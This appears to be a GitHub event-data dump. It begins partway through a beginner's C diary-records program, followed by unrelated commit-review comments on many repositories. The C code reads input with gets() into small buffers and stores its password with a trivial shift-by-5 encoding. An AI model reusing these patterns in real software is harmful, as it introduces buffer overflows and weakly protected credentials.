TYPED SOMETHING ELSE...\\n\");\r\n\r\n                             break;\r\n\r\n                }\r\n\r\n\r\n               printf(\"\\n\\nWOULD YOU LIKE TO CONTINUE VIEWING...(Y/N):\");\r\n\r\n               fflush(stdin);\r\n\r\n            scanf(\"%c\",&choice);\r\n\r\n        }while(choice=='Y'||choice=='y');\r\n\r\n            fclose ( fpte ) ;\r\n\r\n            return ;\r\n\r\n}\r\n\r\nvoid editrecord()\r\n\r\n{\r\n\r\n        system(\"cls\");\r\n\r\n        FILE *fpte ;\r\n\r\n        struct record customer ;\r\n\r\n        char time[6],choice,filename[14];\r\n\r\n        int num,count=0;\r\n\r\n        printf(\"\\n\\n\\t\\t*******************************\\n\");\r\n\r\n        printf(\"\\t\\t* WELCOME TO THE EDITING MENU *\");\r\n\r\n        printf(\"\\n\\t\\t*******************************\\n\\n\");\r\n\r\n        choice=password();\r\n\r\n        if(choice!=0)\r\n\r\n            {\r\n\r\n                return ;\r\n\r\n            }\r\n\r\n        do\r\n\r\n            {\r\n\r\n                    printf(\"\\n\\tENTER THE DATE OF RECORD TO BE EDITED:[yyyy-mm-dd]:\");\r\n\r\n                    fflush(stdin);\r\n\r\n                    gets(filename);\r\n\r\n                    printf(\"\\n\\tENTER TIME:[hh:mm]:\");\r\n\r\n                    gets(time);\r\n\r\n                    fpte = fopen ( filename, \"rb+\" ) ;\r\n\r\n                    if ( fpte == NULL )\r\n\r\n                            {\r\n\r\n                                printf( \"\\nRECORD DOES NOT EXISTS:\" ) ;\r\n\r\n                                printf(\"\\nPRESS ANY KEY TO GO BACK\");\r\n\r\n                                getch();\r\n\r\n                                return;\r\n\r\n                            }\r\n\r\n                    while ( fread ( &customer, sizeof ( customer ), 1, fpte ) == 1 )\r\n\r\n                    {\r\n\r\n                        if(strcmp(customer.time,time)==0)\r\n\r\n                        {\r\n\r\n                            printf(\"\\nYOUR OLD RECORD WAS AS:\");\r\n\r\n                            printf(\"\\nTIME: %s\",customer.time);\r\n\r\n                            printf(\"\\nMEETING WITH: %s\",customer.name);\r\n\r\n                            printf(\"\\nMEETING AT: %s\",customer.place);\r\n\r\n                            printf(\"\\nDURATION: %s\",customer.duration);\r\n\r\n                            printf(\"\\nNOTE: %s\",customer.note);\r\n\r\n\r\n                            printf(\"\\n\\n\\t\\tWHAT WOULD YOU LIKE TO EDIT..\");\r\n\r\n                                printf(\"\\n1.TIME.\");\r\n\r\n                                printf(\"\\n2.MEETING PERSON.\");\r\n\r\n                                printf(\"\\n3.MEETING PLACE.\");\r\n\r\n                                printf(\"\\n4.DURATION.\");\r\n\r\n                                printf(\"\\n5.NOTE.\");\r\n\r\n                                printf(\"\\n6.WHOLE RECORD.\");\r\n\r\n                                printf(\"\\n7.GO BACK TO MAIN MENU.\");\r\n\r\n                                do\r\n\r\n                                {\r\n\r\n                                        printf(\"\\n\\tENTER YOUR CHOICE:\");\r\n\r\n                                        fflush(stdin);\r\n\r\n                                        scanf(\"%d\",&num);\r\n\r\n                                        fflush(stdin);\r\n\r\n                                        switch(num)\r\n\r\n                                        {\r\n\r\n                                            case 1: printf(\"\\nENTER THE NEW DATA:\");\r\n\r\n                                                    printf(\"\\nNEW TIME:[hh:mm]:\");\r\n\r\n                                                    gets(customer.time);\r\n\r\n                                                    break;\r\n\r\n\r\n                                            case 2: printf(\"\\nENTER THE NEW DATA:\");\r\n\r\n                                                    printf(\"\\nNEW MEETING PERSON:\");\r\n\r\n                                                    gets(customer.name);\r\n\r\n                                                    break;\r\n\r\n\r\n                                            case 3: printf(\"\\nENTER THE NEW DATA:\");\r\n\r\n                                                    printf(\"\\nNEW MEETING PLACE:\");\r\n\r\n                                                    gets(customer.place);\r\n\r\n                                                    break;\r\n\r\n\r\n                                            case 4: printf(\"\\nENTER THE NEW DATA:\");\r\n\r\n                                                    printf(\"\\nDURATION:\");\r\n\r\n                                                    gets(customer.duration);\r\n\r\n                                                    break;\r\n\r\n\r\n                                            case 5: printf(\"ENTER THE NEW DATA:\");\r\n\r\n                                                    printf(\"\\nNOTE:\");\r\n\r\n                                                    gets(customer.note);\r\n\r\n                                                    break;\r\n\r\n\r\n                                            case 6:  printf(\"\\nENTER THE NEW DATA:\");\r\n\r\n                                                     printf(\"\\nNEW TIME:[hh:mm]:\");\r\n\r\n                                                     gets(customer.time);\r\n\r\n                                                     printf(\"\\nNEW MEETING PERSON:\");\r\n\r\n                                                     gets(customer.name);\r\n\r\n                                                     printf(\"\\nNEW MEETING PLACE:\");\r\n\r\n                                                     gets(customer.place);\r\n\r\n                                                     printf(\"\\nDURATION:\");\r\n\r\n                                                     gets(customer.duration);\r\n\r\n                                                     printf(\"\\nNOTE:\");\r\n\r\n                                                     gets(customer.note);\r\n\r\n                                                     break;\r\n\r\n\r\n                                            case 7: printf(\"\\nPRESS ANY KEY TO GO BACK...\\n\");\r\n\r\n                                                    getch();\r\n\r\n                                                    return ;\r\n\r\n                                                    break;\r\n\r\n\r\n                                            default: printf(\"\\nYOU TYPED SOMETHING ELSE...TRY AGAIN\\n\");\r\n\r\n                                                     break;\r\n\r\n                                        }\r\n\r\n\r\n                                }while(num<1||num>8);\r\n\r\n                            fseek(fpte,-sizeof(customer),SEEK_CUR);\r\n\r\n                            fwrite(&customer,sizeof(customer),1,fpte);\r\n\r\n                            fseek(fpte,-sizeof(customer),SEEK_CUR);\r\n\r\n                            fread(&customer,sizeof(customer),1,fpte);\r\n\r\n                            choice=5;\r\n\r\n                            break;\r\n\r\n                        }\r\n\r\n                    }\r\n\r\n                    if(choice==5)\r\n\r\n                    {\r\n\r\n                    system(\"cls\");\r\n\r\n                    printf(\"\\n\\t\\tEDITING COMPLETED...\\n\");\r\n\r\n                    printf(\"--------------------\\n\");\r\n\r\n                    printf(\"THE NEW RECORD IS:\\n\");\r\n\r\n                    printf(\"--------------------\\n\");\r\n\r\n                    printf(\"\\nTIME: %s\",customer.time);\r\n\r\n                    printf(\"\\nMEETING WITH: %s\",customer.name);\r\n\r\n                    printf(\"\\nMEETING AT: %s\",customer.place);\r\n\r\n                    printf(\"\\nDURATION: %s\",customer.duration);\r\n\r\n                    printf(\"\\nNOTE: %s\",customer.note);\r\n\r\n                    fclose(fpte);\r\n\r\n                    printf(\"\\n\\n\\tWOULD YOU LIKE TO EDIT ANOTHER RECORD.(Y/N)\");\r\n\r\n                    scanf(\"%c\",&choice);\r\n\r\n                    count++;\r\n\r\n                    }\r\n\r\n                    else\r\n\r\n                    {\r\n\r\n                        printf(\"\\nTHE RECORD DOES NOT EXIST::\\n\");\r\n\r\n                        printf(\"\\nWOULD YOU LIKE TO TRY AGAIN...(Y/N)\");\r\n\r\n                        scanf(\"%c\",&choice);\r\n\r\n                    }\r\n\r\n\r\n            }while(choice=='Y'||choice=='y');\r\n\r\n            fclose ( fpte ) ;\r\n\r\n\r\n            if(count==1)\r\n\r\n            printf(\"\\n%d FILE IS EDITED...\\n\",count);\r\n\r\n            else if(count>1)\r\n\r\n            printf(\"\\n%d FILES ARE EDITED..\\n\",count);\r\n\r\n            else\r\n\r\n            printf(\"\\nNO FILES EDITED...\\n\");\r\n\r\n            printf(\"\\tPRESS ENTER TO EXIT EDITING MENU.\");\r\n\r\n            getch();\r\n\r\n}\r\n\r\nint password()\r\n\r\n{\r\n\r\n        char pass[15]={0},check[15]={0},ch;\r\n\r\n        FILE *fpp;\r\n\r\n        int i=0,j;\r\n\r\n        printf(\"::FOR SECURITY PURPOSE::\");\r\n\r\n        printf(\"::ONLY THREE TRIALS ARE ALLOWED::\");\r\n\r\n        for(j=0;j<3;j++)\r\n\r\n        {\r\n\r\n                        i=0;\r\n\r\n                        printf(\"\\n\\n\\tENTER THE PASSWORD:\");\r\n\r\n                        pass[0]=getch();\r\n\r\n                        while(pass[i]!='\\r')\r\n\r\n                        {\r\n\r\n                            if(pass[i]=='\\b')\r\n\r\n                            {\r\n\r\n                                i--;\r\n\r\n                                printf(\"\\b\");\r\n\r\n                                printf(\" \");\r\n\r\n                                printf(\"\\b\");\r\n\r\n                                pass[i]=getch();\r\n\r\n                            }\r\n\r\n                            else\r\n\r\n                            {\r\n\r\n                                printf(\"*\");\r\n\r\n                                i++;\r\n\r\n                                pass[i]=getch();\r\n\r\n                            }\r\n\r\n                        }\r\n\r\n                        pass[i]='\\0';\r\n\r\n                        fpp=fopen(\"SE\",\"r\");\r\n\r\n                        if (fpp==NULL)\r\n\r\n                        {\r\n\r\n                            printf(\"\\nERROR WITH THE SYSTEM FILE...[FILE MISSING]\\n\");\r\n\r\n                            getch();\r\n\r\n                            return 1;\r\n\r\n                        }\r\n\r\n                        else\r\n\r\n                        i=0;\r\n\r\n                        while(1)\r\n\r\n                        {\r\n\r\n                            ch=fgetc(fpp);\r\n\r\n                            if(ch==EOF)\r\n\r\n                            {\r\n\r\n                                check[i]='\\0';\r\n\r\n                                break;\r\n\r\n                            }\r\n\r\n                            check[i]=ch-5;\r\n\r\n                            i++;\r\n\r\n                        }\r\n\r\n                        if(strcmp(pass,check)==0)\r\n\r\n                        {\r\n\r\n                            printf(\"\\n\\n\\tACCESS GRANTED...\\n\");\r\n\r\n                            return 0;\r\n\r\n                        }\r\n\r\n                        else\r\n\r\n                        {\r\n\r\n                            printf(\"\\n\\n\\tWRONG PASSWORD..\\n\\n\\tACCESS DENIED...\\n\");\r\n\r\n                        }\r\n\r\n        }\r\n\r\n        printf(\"\\n\\n\\t::YOU ENTERED WRONG PASSWORD::YOU ARE NOT ALLOWED TO ACCESS ANY FILE::\\n\\n\\tPRESS ANY KEY TO GO BACK...\");\r\n\r\n        getch();\r\n\r\n        return 1;\r\n\r\n}\r\n\r\nvoid editpassword()\r\n\r\n{\r\n\r\n    system(\"cls\");\r\n\r\n    printf(\"\\n\");\r\n\r\n    char pass[15]={0},confirm[15]={0},ch;\r\n\r\n    int choice,i,check;\r\n\r\n    FILE *fp;\r\n\r\n    fp=fopen(\"SE\",\"rb\");\r\n\r\n    if(fp==NULL)\r\n\r\n    {\r\n\r\n        fp=fopen(\"SE\",\"wb\");\r\n\r\n        if(fp==NULL)\r\n\r\n        {\r\n\r\n            printf(\"SYSTEM ERROR...\");\r\n\r\n            getch();\r\n\r\n            return ;\r\n\r\n        }\r\n\r\n        fclose(fp);\r\n\r\n        printf(\"\\nSYSTEM RESTORED...\\nYOUR PASSWORD IS 'ENTER'\\n PRESS ENTER TO CHANGE PASSWORD\\n\\n\");\r\n\r\n        getch();\r\n\r\n    }\r\n\r\n        fclose(fp);\r\n\r\n        check=password();\r\n\r\n    if(check==1)\r\n\r\n    {\r\n\r\n        return ;\r\n\r\n    }\r\n\r\n    do\r\n\r\n    {\r\n\r\n        if(check==0)\r\n\r\n                    {\r\n\r\n                        i=0;\r\n\r\n                        choice=0;\r\n\r\n                        printf(\"\\n\\n\\tENTER THE NEW PASSWORD:\");\r\n\r\n                        fflush(stdin);\r\n\r\n                        pass[0]=getch();\r\n\r\n                        while(pass[i]!='\\r')\r\n\r\n                        {\r\n\r\n                            if(pass[i]=='\\b')\r\n\r\n                            {\r\n\r\n                                i--;\r\n\r\n                                printf(\"\\b\");\r\n\r\n                                printf(\" \");\r\n\r\n                                printf(\"\\b\");\r\n\r\n                                pass[i]=getch();\r\n\r\n                            }\r\n\r\n                            else\r\n\r\n                            {\r\n\r\n                                printf(\"*\");\r\n\r\n                                i++;\r\n\r\n                                pass[i]=getch();\r\n\r\n                            }\r\n\r\n                        }\r\n\r\n                        pass[i]='\\0';\r\n\r\n                        i=0;\r\n\r\n                        printf(\"\\n\\tCONFIRM PASSWORD:\");\r\n\r\n                        confirm[0]=getch();\r\n\r\n                        while(confirm[i]!='\\r')\r\n\r\n                        {\r\n\r\n                            if(confirm[i]=='\\b')\r\n\r\n                            {\r\n\r\n                                i--;\r\n\r\n                                printf(\"\\b\");\r\n\r\n                                printf(\" \");\r\n\r\n                                printf(\"\\b\");\r\n\r\n                                confirm[i]=getch();\r\n\r\n                            }\r\n\r\n                            else\r\n\r\n                            {\r\n\r\n                                printf(\"*\");\r\n\r\n                                i++;\r\n\r\n                                confirm[i]=getch();\r\n\r\n                            }\r\n\r\n                        }\r\n\r\n                        confirm[i]='\\0';\r\n\r\n                        if(strcmp(pass,confirm)==0)\r\n\r\n                        {\r\n\r\n                            fp=fopen(\"SE\",\"wb\");\r\n\r\n                            if(fp==NULL)\r\n\r\n                            {\r\n\r\n                                printf(\"\\n\\t\\tSYSTEM ERROR\");\r\n\r\n                                getch();\r\n\r\n                                return ;\r\n\r\n                            }\r\n\r\n                            i=0;\r\n\r\n                            while(pass[i]!='\\0')\r\n\r\n                            {\r\n\r\n                                ch=pass[i];\r\n\r\n                                putc(ch+5,fp);\r\n\r\n                                i++;\r\n\r\n                            }\r\n\r\n                            putc(EOF,fp);\r\n\r\n                            fclose(fp);\r\n\r\n                        }\r\n\r\n                        else\r\n\r\n                        {\r\n\r\n                            printf(\"\\n\\tTHE NEW PASSWORD DOES NOT MATCH.\");\r\n\r\n                            choice=1;\r\n\r\n\r\n                        }\r\n\r\n\r\n                    }\r\n\r\n}while(choice==1);\r\n\r\n\r\n    printf(\"\\n\\n\\tPASSWORD CHANGED...\\n\\n\\tPRESS ANY KEY TO GO BACK...\");\r\n\r\n    getch();\r\n\r\n}\r\n\r\n\r\nvoid deleterecord( )\r\n\r\n{\r\n\r\n                system(\"cls\");\r\n\r\n                FILE *fp,*fptr ;\r\n\r\n                struct record file ;\r\n\r\n                char filename[15],another = 'Y' ,time[10];;\r\n\r\n                int choice,check;\r\n\r\n                printf(\"\\n\\n\\t\\t*************************\\n\");\r\n\r\n                printf(\"\\t\\t* WELCOME TO DELETE MENU*\");\r\n\r\n                printf(\"\\n\\t\\t*************************\\n\\n\");\r\n\r\n                check = password();\r\n\r\n                    if(check==1)\r\n\r\n                    {\r\n\r\n                        return ;\r\n\r\n                    }\r\n\r\n\r\n                while ( another == 'Y' )\r\n\r\n                {\r\n\r\n                printf(\"\\n\\n\\tHOW WOULD YOU LIKE TO DELETE.\");\r\n\r\n                printf(\"\\n\\n\\t#DELETE WHOLE RECORD\\t\\t\\t[1]\");\r\n\r\n                printf(\"\\n\\t#DELETE A PARTICULAR RECORD BY TIME\\t[2]\");\r\n\r\n\r\n                do\r\n\r\n                {\r\n\r\n                        printf(\"\\n\\t\\tENTER YOU CHOICE:\");\r\n\r\n                        scanf(\"%d\",&choice);\r\n\r\n\r\n                    switch(choice)\r\n\r\n                        {\r\n\r\n                            case 1:\r\n\r\n                            printf(\"\\n\\tENTER THE DATE OF RECORD TO BE DELETED:[yyyy-mm-dd]:\");\r\n\r\n                            fflush(stdin);\r\n\r\n                            gets(filename);\r\n\r\n                            fp = fopen (filename, \"wb\" ) ;\r\n\r\n                            if ( fp == NULL )\r\n\r\n                            {\r\n\r\n                                printf(\"\\nTHE FILE DOES NOT EXISTS\");\r\n\r\n                                printf(\"\\nPRESS ANY KEY TO GO BACK.\");\r\n\r\n                                getch();\r\n\r\n                                return ;\r\n\r\n                            }\r\n\r\n                            fclose(fp);\r\n\r\n                            remove(filename);\r\n\r\n                            printf(\"\\nDELETED SUCCESFULLY...\");\r\n\r\n                            break;\r\n\r\n\r\n                            case 2:\r\n\r\n                            printf(\"\\n\\tENTER THE DATE OF RECORD:[yyyy-mm-dd]:\");\r\n\r\n                            fflush(stdin);\r\n\r\n                            gets(filename);\r\n\r\n                            fp = fopen (filename, \"rb\" ) ;\r\n\r\n                            if ( fp == NULL )\r\n\r\n                            {\r\n\r\n                                printf(\"\\nTHE FILE DOES NOT EXISTS\");\r\n\r\n                                printf(\"\\nPRESS ANY KEY TO GO BACK.\");\r\n\r\n                                getch();\r\n\r\n                                return ;\r\n\r\n                            }\r\n\r\n                            fptr=fopen(\"temp\",\"wb\");\r\n\r\n                            if(fptr==NULL)\r\n\r\n                            {\r\n\r\n                                printf(\"\\nSYSTEM ERROR\");\r\n\r\n                                printf(\"\\nPRESS ANY KEY TO GO BACK\");\r\n\r\n                                getch();\r\n\r\n                                return ;\r\n\r\n                            }\r\n\r\n                            printf(\"\\n\\tENTER THE TIME OF RECORD TO BE DELETED:[hh:mm]:\");\r\n\r\n                            fflush(stdin);\r\n\r\n                            gets(time);\r\n\r\n                            while(fread(&file,sizeof(file),1,fp)==1)\r\n\r\n                            {\r\n\r\n                                if(strcmp(file.time,time)!=0)\r\n\r\n                                fwrite(&file,sizeof(file),1,fptr);\r\n\r\n                            }\r\n\r\n\r\n                            fclose(fp);\r\n\r\n                            fclose(fptr);\r\n\r\n                            remove(filename);\r\n\r\n                            rename(\"temp\",filename);\r\n\r\n                            printf(\"\\nDELETED SUCCESFULLY...\");\r\n\r\n                            break;\r\n\r\n\r\n                    default:\r\n\r\n                            printf(\"\\n\\tYOU ENTERED WRONG CHOICE\");\r\n\r\n                            break;\r\n\r\n                    }\r\n\r\n                }while(choice<1||choice>2);\r\n\r\n\r\n\r\n                    printf(\"\\n\\tDO YOU LIKE TO DELETE ANOTHER RECORD.(Y/N):\");\r\n\r\n                    fflush(stdin);\r\n\r\n                    scanf(\"%c\",&another);\r\n\r\n                }\r\n\r\n                printf(\"\\n\\n\\tPRESS ANY KEY TO EXIT...\");\r\n\r\n                getch();\r\n\r\n}\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-13T14:35:34Z"}
{"id":"4555996183","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19002520,"position":162,"line":230,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T14:35:35Z","updated_at":"2016-09-13T14:35:35Z","body":"I think we should change this to:\r\n\r\n```\r\ncreateChildContext(withParent parent: NSManagedObjectContext) -> NSManagedObjectContext\r\n```"}},"created_at":"2016-09-13T14:35:35Z"}
{"id":"4556001497","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19002542,"position":116,"line":173,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T14:36:25Z","updated_at":"2016-09-13T14:36:25Z","body":"These three static vars can all be private instead of fileprivate."}},"created_at":"2016-09-13T14:36:25Z"}
{"id":"4556001511","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002543,"position":21,"line":43,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-13T14:36:25Z","updated_at":"2016-09-13T14:36:25Z","body":"It would be more efficient to project P on the line through AB, to simply get X. It would prevent two heavy `sqrt` calls."}},"created_at":"2016-09-13T14:36:25Z"}
{"id":"4556003702","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"SpencerLJack/homework-portfolio"},"payload":{"comment":{"id":19002551,"position":46,"line":46,"path":"Week 8/contact.html","commit_id":"ee8e6787a1fa16c644d4bf16815063b8fc6bc4c4","created_at":"2016-09-13T14:36:45Z","updated_at":"2016-09-13T14:36:45Z","body":"Be sure to match the \"for\" attribute on the label to the id on the corresponding input. "}},"created_at":"2016-09-13T14:36:45Z"}
{"id":"4556004191","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19002556,"position":null,"line":null,"path":null,"commit_id":"2966f74424d7d50ca360ef0aea844b18b80f2df9","created_at":"2016-09-13T14:36:50Z","updated_at":"2016-09-13T14:36:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 989](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13188&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-13T14:36:50Z"}
{"id":"4556006048","type":"CommitCommentEvent","actor":{"login":"pongstr"},"repo":{"name":"devcsrj/devcsrj.github.io"},"payload":{"comment":{"id":19002562,"position":51,"line":51,"path":"_posts/2016-07-30-underestimating-your-first-hike.markdown","commit_id":"4625ed136331d34841cb81204b089f303f9763b1","created_at":"2016-09-13T14:37:09Z","updated_at":"2016-09-13T14:37:09Z","body":"This summit selfie looks pretty rad."}},"created_at":"2016-09-13T14:37:09Z"}
{"id":"4556009019","type":"CommitCommentEvent","actor":{"login":"lyrachord"},"repo":{"name":"lyrachord/javolution"},"payload":{"comment":{"id":19002572,"position":null,"line":null,"path":null,"commit_id":"ce572556b8ef6e8169fe548376f44238c85af40e","created_at":"2016-09-13T14:37:34Z","updated_at":"2016-09-13T14:37:34Z","body":"both modifications same logical. Something I missed?"}},"created_at":"2016-09-13T14:37:34Z"}
{"id":"4556011965","type":"CommitCommentEvent","actor":{"login":"neikeq"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":19002581,"position":null,"line":null,"path":null,"commit_id":"f10d2bd3944f3a520cf9f131b801f403c834ea6e","created_at":"2016-09-13T14:37:59Z","updated_at":"2016-09-13T14:37:59Z","body":"What's the point of this distraction mode now? Wouldn't it be the same as fullscreen mode? IMO it was fine :("}},"created_at":"2016-09-13T14:37:59Z"}
{"id":"4556016624","type":"CommitCommentEvent","actor":{"login":"grelland"},"repo":{"name":"dhis2/dhis2-core"},"payload":{"comment":{"id":19002591,"position":393,"line":398,"path":"dhis-2/dhis-web/dhis-web-commons-resources/src/main/webapp/dhis-web-commons/javascripts/dhis2/dhis2.angular.controllers.js","commit_id":"367bdb26fdc99486dda151f5b999c235f9b56268","created_at":"2016-09-13T14:38:40Z","updated_at":"2016-09-13T14:38:40Z","body":"Probably want to fix this! :--)"}},"created_at":"2016-09-13T14:38:40Z"}
{"id":"4556017384","type":"CommitCommentEvent","actor":{"login":"Wagnard"},"repo":{"name":"Wagnard/display-drivers-uninstaller"},"payload":{"comment":{"id":19002593,"position":null,"line":null,"path":null,"commit_id":"0ee61d9c68a075a025c9d230f9936afa3159ba68","created_at":"2016-09-13T14:38:47Z","updated_at":"2016-09-13T14:38:47Z","body":"This wont be the official release, found some other remaining for AMD."}},"created_at":"2016-09-13T14:38:47Z"}
{"id":"4556024433","type":"CommitCommentEvent","actor":{"login":"dreispt"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19002603,"position":null,"line":null,"path":null,"commit_id":"75f60f69416625713819c810d2da33db4dc0b06c","created_at":"2016-09-13T14:39:51Z","updated_at":"2016-09-13T14:39:51Z","body":"Thanks!"}},"created_at":"2016-09-13T14:39:51Z"}
{"id":"4556026522","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002611,"position":28,"line":50,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-13T14:40:13Z","updated_at":"2016-09-13T14:40:13Z","body":"Before `ab`, after `ba`. Fixed this for you in 73506345acf7a7724491e693c04ad126ff25a194."}},"created_at":"2016-09-13T14:40:13Z"}
{"id":"4556026706","type":"CommitCommentEvent","actor":{"login":"Daniel-dk"},"repo":{"name":"geolink/opentracker"},"payload":{"comment":{"id":19002612,"position":null,"line":null,"path":null,"commit_id":"def3fb8bae307c41dd8fb86d08fc6d4ed9b479c7","created_at":"2016-09-13T14:40:15Z","updated_at":"2016-09-13T14:40:15Z","body":"I had to remove the debug print before initializing the USB console, seems to work OK. ( Windows mounts and unmounts it successfully and I see serial debug data coming thru after it wakes.\r\n```\r\nvoid exit_low_power() {\r\n//debug_print(F(\"exit_low_power() started\")); // seemed to block/hang on this \r\n  cpu_full_speed();\r\n\r\n  usb_console_restore();\r\n\r\n  // enable serial ports\r\n  gsm_open();\r\n  gsm_wakeup();\r\n\r\n  gps_open();\r\n  gps_wakeup();\r\n\r\n  addon_event(ON_DEVICE_WAKEUP);\r\n\r\n  debug_print(F(\"exit_low_power() completed\"));\r\n}\r\n```\r\n\r\nmy bench PSU reports Power consumption ( Vin = 12.4 V ) to drop from 120 mA at full speed  down to around 40 mA in low speed - it doesn't have good resolution but there is a difference.\r\n\r\nwe might also have to disable the status LED in sleep - if it is on while the device goes to low speed mode it stays on - consuming power"}},"created_at":"2016-09-13T14:40:15Z"}
{"id":"4556026807","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"SpencerLJack/homework-portfolio"},"payload":{"comment":{"id":19002613,"position":55,"line":55,"path":"Week 8/contact.html","commit_id":"ee8e6787a1fa16c644d4bf16815063b8fc6bc4c4","created_at":"2016-09-13T14:40:16Z","updated_at":"2016-09-13T14:40:16Z","body":"These radio buttons are a little broken for a couple reasons. Because the inputs are wrapped in labels, there's no reason to add the for attribute. However, because the for attributes don't match the ids of the inputs, clicking the labels no longer works. A bigger issue though, is that the name attribute for each of these radio buttons should be the same so that only one can be selected; right now you can select all 3. "}},"created_at":"2016-09-13T14:40:16Z"}
{"id":"4556027371","type":"CommitCommentEvent","actor":{"login":"tomalec"},"repo":{"name":"PuppetJs/PuppetJs"},"payload":{"comment":{"id":19002617,"position":null,"line":null,"path":null,"commit_id":"e4fc9c9c74873df738b1da181e3023e0d6d6795e","created_at":"2016-09-13T14:40:20Z","updated_at":"2016-09-13T14:40:20Z","body":"It will not work as we need clone, so we could review it after following changes"}},"created_at":"2016-09-13T14:40:20Z"}
{"id":"4556027543","type":"CommitCommentEvent","actor":{"login":"jasongilanfarr"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19002618,"position":49,"line":179,"path":"src/main/scala/mesosphere/marathon/core/election/impl/CuratorElectionService.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T14:40:21Z","updated_at":"2016-09-13T14:40:21Z","body":"Catch all non fatal errors? Seems fine by me. Frankly, I think we really need to revisit the leadership behavior."}},"created_at":"2016-09-13T14:40:21Z"}
{"id":"4556027551","type":"CommitCommentEvent","actor":{"login":"sisk"},"repo":{"name":"sisk/active_zuora"},"payload":{"comment":{"id":19002619,"position":null,"line":null,"path":null,"commit_id":"091fb258ae76d6a2ef2e0e6c9887309447cbbad2","created_at":"2016-09-13T14:40:22Z","updated_at":"2016-09-13T14:40:22Z","body":"This was necessary to stop a VCR cassette from failing, since it was recorded with an old version of the gem that included Price in the service query. I would not recommend incorporating it into the main code stream."}},"created_at":"2016-09-13T14:40:22Z"}
{"id":"4556029721","type":"CommitCommentEvent","actor":{"login":"drewpitchford"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19002624,"position":162,"line":230,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T14:40:41Z","updated_at":"2016-09-13T14:40:41Z","body":"I thought with Swift 3 guidelines it would be:\r\n\r\n`createChildContext(with parent: NSManageObjectContext)`\r\n\r\nThe double name `withObj obj` is out right?"}},"created_at":"2016-09-13T14:40:41Z"}
{"id":"4556030527","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19002629,"position":229,"line":331,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T14:40:49Z","updated_at":"2016-09-13T14:40:49Z","body":"This is another case where we can take advantage of the new generic typing for fetch requests:\r\n\r\n```\r\nlet request = NSFetchRequest<NSManagedObject>(entityName: entityName)\r\n```"}},"created_at":"2016-09-13T14:40:49Z"}
{"id":"4556030551","type":"CommitCommentEvent","actor":{"login":"wittnet"},"repo":{"name":"wittnet/freeserf"},"payload":{"comment":{"id":19002631,"position":null,"line":null,"path":null,"commit_id":"e5164bcabdd7f9c282450533f6bc73b3c8494567","created_at":"2016-09-13T14:40:49Z","updated_at":"2016-09-13T14:40:49Z","body":"Some typo in here! Should be called \"Removed c++11 feature 'delete' to make it work under Debian/Gcc-4.9.2\""}},"created_at":"2016-09-13T14:40:49Z"}
{"id":"4556030702","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19002632,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-13T14:40:50Z","updated_at":"2016-09-13T14:40:50Z","body":"Perfect, then both lines are not needed (maybe a relict from me testing with different dvfs settings -- don't know and doesn't really matter any more)."}},"created_at":"2016-09-13T14:40:50Z"}
{"id":"4556033502","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19002638,"position":null,"line":null,"path":null,"commit_id":"720cbbfb1b246ea4499067a7096b1e3ed0b4ba1f","created_at":"2016-09-13T14:41:16Z","updated_at":"2016-09-13T14:41:16Z","body":"Make labels (like 'Name' and 'Roll') inside 'SAC INFO' tab bold."}},"created_at":"2016-09-13T14:41:16Z"}
{"id":"4556036392","type":"CommitCommentEvent","actor":{"login":"kangaroocry"},"repo":{"name":"kangaroocry/nmrglue"},"payload":{"comment":{"id":19002648,"position":null,"line":null,"path":null,"commit_id":"71cb41ebd286315235d7af7b6b7d249d6fb91602","created_at":"2016-09-13T14:41:40Z","updated_at":"2016-09-13T14:41:40Z","body":"Sorry, I was wrong about the consistency with uc_from_freqscale. It was consistent in the first place, became inconsistent with my first change. Now I made it consistent by another change in uc_from_freqscale (in the same branch). Also, I had a check in Bruker TopSpin and it is calculating the frequency values according to the method I introduced. Maybe it is different for other software, but I don't know."}},"created_at":"2016-09-13T14:41:40Z"}
